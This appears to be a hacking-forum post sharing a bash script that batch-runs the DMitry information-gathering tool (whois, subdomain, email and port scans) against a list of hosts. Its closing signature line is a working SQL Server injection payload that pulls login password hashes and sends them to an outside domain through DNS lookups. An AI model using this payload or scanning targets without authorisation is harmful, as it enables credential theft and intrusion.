Dmitrysome - Script for DMitry (Deepmagic Information Gathering Tool)

Iniciado por 'or '1'=1, Febrero 16, 2017, 07:24:23 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Febrero 16, 2017, 07:24:23 AM Ultima modificación: Febrero 16, 2017, 08:21:00 AM por 'or '1'=1
Hello everyone ... in this night I was recon some targets using dmitry ... it's tedious cus you can't recon a lot of targets in one time, needs to be one per one, fuck that! ...

Código: bash
echo -e ".-=~=-   	       	                                            .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(__  _)
( _ __)  ____  _  _  __  ____  ____  _  _  ____   __   _  _  ____   ( _ __)
(__   ) (    \( \/ )(  )(_  _)(  _ \( \/ )/ ___) /  \ ( \/ )(  __)  (   __)
(   __) ) D (/ \/ \ )(   )(   )   / )  / \___ \(  O )/ \/ \ ) _)   (    _)
(_    ) (____/\_)(_/(__) (__) (__\_)(__/  (____/ \__/ \_)(_/(____)  (__  _)
( _ __)                                               by 0xb4dc0d3  ( _ __)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(_ ___)
(__  _)     (_____)
(_ ___) Usage: ./dmitrysome -winsepfb -t filename.txt              (____ )
( _ __) -----------------------------------------------     (_____)
(__  _) -w ==> Whois lookup on the domain name of a host    (__ __)
( _ __) -i ==> Whois lookup on the IP address of a host     ( ____)
(_____) -n ==> Retrieve Netcraft information on a host      (_ _ _)
(_   _) -s ==> Perform a search for possible subdomains     (___  )
( _ _ ) -e ==> Perform a search for possible email address  (__  _)
(__   ) -p ==> Perform a TCP port scan on a host     (___ _)
(____ ) -f ==> Perform a TCP port scan on a host (filtered) (_____)
(__   ) -b ==> Read banners received from scanned ports     (_____)
(_    ) -t ==> Set TTL in seconds scanning TCP ports     (_    )
(     )     (__   )
(    _) /*/ Requires the -p flagged to be passed /*/     (_____)
(   __)             (_   _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(_ ___)"
echo -n "Insert options => "
read parameters
echo -n "Insert TTL => "
read ttl
echo "Running script ..."
while IFS='' read -r host || [[ -n "$host" ]]; do
gnome-terminal --tab  -e "gnome-terminal --geometry=260x25-0+0 --tab -e 'dmitry -$parameters -t $ttl -o $host.txt $host'"
done < "$1"




I'll update it ... someday /?

enjoy :)
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--